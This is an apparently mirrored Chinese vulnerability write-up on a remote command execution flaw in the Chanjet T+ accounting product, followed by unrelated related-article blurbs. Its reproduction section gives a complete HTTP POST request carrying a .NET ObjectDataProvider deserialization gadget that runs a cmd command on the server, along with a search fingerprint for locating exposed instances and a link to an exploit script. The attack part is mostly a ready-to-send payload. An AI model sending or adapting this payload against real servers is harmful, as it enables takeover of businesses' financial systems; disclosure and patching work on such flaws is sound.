畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

news/2024/5/16 15:21:15

一、漏洞信息

漏洞名称:畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

漏洞类别:远程命令执行漏洞

风险等级:高危

二、漏洞描述

畅捷通TPlus适用于异地多组织、多机构对企业财务汇总的管理需求;全面支持企业对远程仓库、异地办事处的管理需求;全面满足企业财务业务一体化管理需求。其Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore接口存在反序列化漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。 


三、影响范围

app="畅捷通-TPlus"


四、漏洞复现

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 589{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo": {"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","FileName":"cmd", "Arguments":"/c whoami > tt.txt"}}}
}


五、脚本

https://github.com/ATonysan/poc-exp/blob/main/ChangJieTongT%2B_GetStoreWarehouseByStore_RCE.py


http://www.mrgr.cn/p/71000401

相关文章

Autosar-CanNm、Nm配置详解(免费)-1

3.1由DBC创建Nm、CanNM ETAS工具可根据DBC文件,自动配置生成Nm、CanNm模块。但是关键的一点是要生成NM、CanNM模块DBC文件中必须有NM类型的报文。 还有一点,即使DBC文件中有Nm的报文,但是因为报文的类型在导入时没有设置成Nm,那也…

数据分析能力模型分析与展示

具体内容: 专业素质 专业素质-01 数据处理 能力定义•能通过各种数据处理工具及数据处理方法,对内外部海量数据进行清洗和运用,提供统一数据标准,为业务分析做好数据支持工作。 L1•掌握一…

HTML 简介

​HTML(HyperText Markup Language,中文:超文本标记语言)是一种用于创建网页结构和内容的标记语言。它由一系列标签组成,这些标签描述了网页中的各个元素和其它相关信息。通过使用HTML标签和属性,开发人员可以定义文本、图像、链接、表格、表单等元素,并控制它们的外观和…

springboot关于注册条件相关内容

核心注解为@Condition//如果配置文件中存在了指定信息,才会注入,否则不注入 @ConditionalOnProperty(prefix = "country",name={"name","system"})此时因为配置文件中没有指定信息,所以没有注入到ioc池中,Country country = context.getBean…

m基于深度学习网络的中药识别系统matlab仿真,包含GUI界面

1.算法仿真效果 matlab2022a仿真结果如下: 2.算法涉及理论知识概要中药识别是中医药领域中的一项重要任务,对于确保药品质量、保障用药安全具有重要意义。传统的中药识别方法主要依赖人工经验和形态特征,但存在主观性强、效率低下等问题。近年来,深度学习在图像识别领域取得…

Jupyter R绘图 汉字显示乱码的解决办法

1.Jupyte中,R绘图,汉字显示乱码 2.如何解决? (1)R中安装showtext 登录linux服务器 #R > install.packages(“showtext”) … 出错 (2)退出R,安装freetype-config #apt install libfreetype6-dev 出错 (3)进入R&…

二极管在晶振震荡电路中作用

在含有两个电容的晶振震荡电路中,二极管需要串联进电路中,在含有电源与接地回路中,对该节点给出一个高电平,输出端输出0-1的高低电平。 两个回路中需要对输出端进行电路分析。配置好电源。晶振需要与两个并联电容串接。 对于晶振,可以使用NE555来实现相同的功能。设计相同…

ADAS多传感器后融合算法解析-上篇

ADAS系统是一种高自动化的软件应用,对系统的鲁棒性与可靠性要求很高,单一传感器往往存在一定限制,此时便需要多传感器融合。多传感器融合会带来如下收益:* 可以在部分场景提升整体感知精度。* 某一传感器出现错误/失效时可以使用另一传感器进行补偿。* 多传感器可以扩…

【评分标准】【网络系统管理】2019年全国职业技能大赛高职组计算机网络应用赛项H卷 无线网络勘测设计

第一部分:无线网络勘测设计评分标准 序号评分项评分细项评分点说明评分方式分值1点位设计图AP编号AP编号符合“AP型号位置编号”完全匹配5AP型号独立办公室、小型会议室选用WALL AP110完全匹配5员工寝室选用智分,其他用放装完全匹配5其它区域选用放装AP…

俚语加密漫谈

俚语加密是一种古老而有效的通信方式,将特定词语或短语在群体内赋予特殊含义,从而隐藏真实信息。类似于方言,它在历史上的应用不可忽视。随着计算机时代的到来,现代密码学通过数学运算编织密语,使得加密变得更加高深莫…

DNS隧道攻击

什么是DNS隧道? DNS隧道是一种网络通信技术,它利用DNS(Domain Name System,域名系统)协议来建立隐蔽的通信通道。在正常情况下,DNS协议主要用于将域名解析为IP地址,但攻击者可以通过构造特殊的…

2017年全国大学生信息安全竞赛-填数游戏

2017年全国大学生信息安全竞赛 填数游戏: 题目描述:答案加flag{} 解题方法:题目附件下载下来发现是一个.exe文件,运行一下弹出一个输入框,随便输入几个数字,得到一个fail这里我们还是一样的把它放进exeinfope.exe去查看一下他的属性信息:这里我们发现是一个32位的无壳的…

PIP换源,虚拟环境以及pycharm操作

​ PIP换源,虚拟环境以及pycharm操作 1 PIP换源我们使用的很多包就是第三方的,需要命令安装,导入使用,国内访问国外的资源,慢并且有可能会访问不到所以要进行pip换源。默认pip就是使用的外网地址https://python.org/1.1 临时换源 …

推荐 10 个非常有用的 Golang Libraries

推荐 10 个非常有用的 Golang Libraries 原创 Go Official Blog Go Official Blog 2024-03-25 18:16 山东 听全文Go 语言的标准库非常好用。通常情况下,你不需要任何额外的库来完成任务。 但是在某些情况下,可能需要使用一些库。今天将与你分享日常工作中很有用的 10 个 Go 库…

1.简单使用SmartTable

愿你出走半生,归来仍是少年! 环境:Android Studio 在android上进行统计数据、列表、表格数据等信息展示是常有的需求。 在Github上有一个优秀的控件:smartTable 1.功能介绍 快速配置自动生成表格;自动计算表格宽高;表…

企业微信变更主体公证怎么弄?

企业微信变更主体有什么作用?现在很多公司都用企业微信来加客户,有时候辛辛苦苦积累了很多客户,但是公司却因为各种各样的原因需要注销,那么就需要通过企业微信变更主体的方法,把企业微信绑定的公司更改为最新的。企业…